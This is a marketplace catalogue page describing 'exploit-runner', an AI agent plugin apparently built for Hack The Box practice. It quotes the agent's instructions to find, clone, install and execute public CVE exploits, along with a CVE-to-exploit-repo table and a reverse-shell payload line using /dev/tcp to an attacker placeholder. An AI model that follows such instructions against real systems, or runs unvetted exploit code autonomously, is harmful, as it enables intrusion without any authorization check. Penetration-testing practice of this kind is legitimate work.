Getting it into your agent
One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.
npx agentmods add agents/allsmog/blackbox-claude-plugin/exploit-runnergit clone --depth 1 https://github.com/allsmog/blackbox-claude-pluginWhat it costs to keep this loaded
Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.
| Model | Per session | Once invoked |
|---|---|---|
| Fable 5 | $0.00147 | $0.01391 |
| Opus 5 | $0.00073 | $0.00696 |
| Sonnet 5 | $0.00029 | $0.00278 |
| Haiku 4.5 | $0.00015 | $0.00139 |
Grade A, and why
exploit-runner scanned grade A with 1 finding against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 2d ago.
A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.
Makes network callslowCapability
Not a fault in itself. Listed so you know the mod talks to something, and to what.
| CVE-2021-41773 | Apache Path Traversal | Built-in (curl) | How it starts
The opening of the file, as written. The whole thing — 188 lines — stays where its author put it; the contents beside it link to each section on GitHub.
Exploit Runner Agent
Purpose
Automatically find, clone, and execute working exploits for identified CVEs.
Behavior
On Invocation
- Identify the CVE or vulnerability
- Search GitHub for PoC exploits
- Clone the most starred/recent repo
- Adapt exploit for target (IP, port, payload)
- Execute and verify success
- Provide troubleshooting if failed
CVE to Exploit Database
Quick reference for common HTB CVEs:
Web Application
| CVE | Name | Exploit Repo |
|---|---|---|
| CVE-2021-41773 | Apache Path Traversal | Built-in (curl) |
| CVE-2021-44228 | Log4Shell | github.com/kozmer/log4j-shell-poc |
| CVE-2022-22965 | Spring4Shell | github.com/BobTheShoplifter/Spring4Shell-POC |
Authentication Bypass
| CVE | Name | Exploit Repo |
|---|---|---|
| CVE-2025-31161 | CrushFTP Auth Bypass | Built-in script |
| CVE-2023-22515 | Confluence Auth Bypass | github.com/Chocapikk/CVE-2023-22515 |
Remote Code Execution
| CVE | Name | Exploit Repo |
|---|---|---|
| CVE-2025-32433 | Erlang SSH Pre-Auth RCE | github.com/ProDefense/CVE-2025-32433 |
| CVE-2024-4577 | PHP-CGI Argument Injection | github.com/watchtowrlabs/CVE-2024-4577 |
| CVE-2023-46747 | F5 BIG-IP RCE | github.com/W01fh4cker/CVE-2023-46747-RCE |
Exploit Search Strategy
# 1. Search GitHub for CVE
# Pattern: CVE-YYYY-NNNNN
# 2. Clone top result
git clone https://github.com/<user>/<repo>.git /tmp/<cve>
# 3. Check for Python exploit
ls /tmp/<cve>/*.py
# 4. Install dependencies if needed
pip install -r /tmp/<cve>/requirements.txt 2>/dev/null
# 5. Read usage
cat /tmp/<cve>/README.md
python /tmp/<cve>/*.py --help
Exploit Adaptation
For each exploit, modify:
# Target configuration
HOST = "<TARGET_IP>"
PORT = <TARGET_PORT>
# Attacker configuration
LHOST = "<ATTACKER_IP>"
LPORT = <LISTENER_PORT>
# Payload (for RCE)
COMMAND = "cat /root/root.txt"
# or
COMMAND = "bash -i >& /dev/tcp/<ATTACKER>/4444 0>&1"
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- 2d ago First seen · 188 lines · 147 tokens per session scan A 23eadfaf4258
exploit-runner is an agent published in the GitHub repository allsmog/blackbox-claude-plugin (5 stars, last pushed 6mo ago), licensed MIT. It adds 147 tokens to every session and 1,391 once invoked, about $0.0007 per session on Opus 5. A static security scan graded it A with 1 finding (makes network calls). No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-31.
Other agents, from other repositories
redteam-agent
Red Team penetration testing agent for HTB Expressway. Use when the user wants to attack or pentest the target machine. Executes reconnaissance, enumeration, exploitation, and privilege escalation. ALWAYS shows attack plan first before executing.
report-agent
Security report writer agent. Use after the Red Team Agent completes an attack to generate professional penetration testing reports in Markdown format following OWASP and PTES standards.
osint-collector
Delegates to this agent when the user asks about OSINT, reconnaissance, information gathering, target profiling, email harvesting, subdomain enumeration, social media recon, breach data, open source intelligence, or building a target dossier for authorized engagements.
vuln-scanner
Delegates to this agent when the user wants to run vulnerability scans, identify CVEs in target systems, use tools like nuclei, nikto, or OpenVAS, parse vulnerability scan results, or prioritize vulnerabilities for exploitation during authorized penetration testing.
supply-chain-auditor
Delegates to this agent when the user wants to audit software supply chain risk, generate or review an SBOM, hunt for dependency confusion and typosquatting exposure, inspect lockfile and package integrity, review install-time scripts in third-party packages, assess build and artifact provenance, or evaluate the blast…
database-attacker
Delegates to this agent when the user wants database-specific offensive testing on an authorized target — SQL and NoSQL injection depth, authenticated database enumeration, DBMS privilege escalation, and safe data-extraction validation across MySQL, PostgreSQL, MSSQL, Oracle, MongoDB, and Redis. Executes with…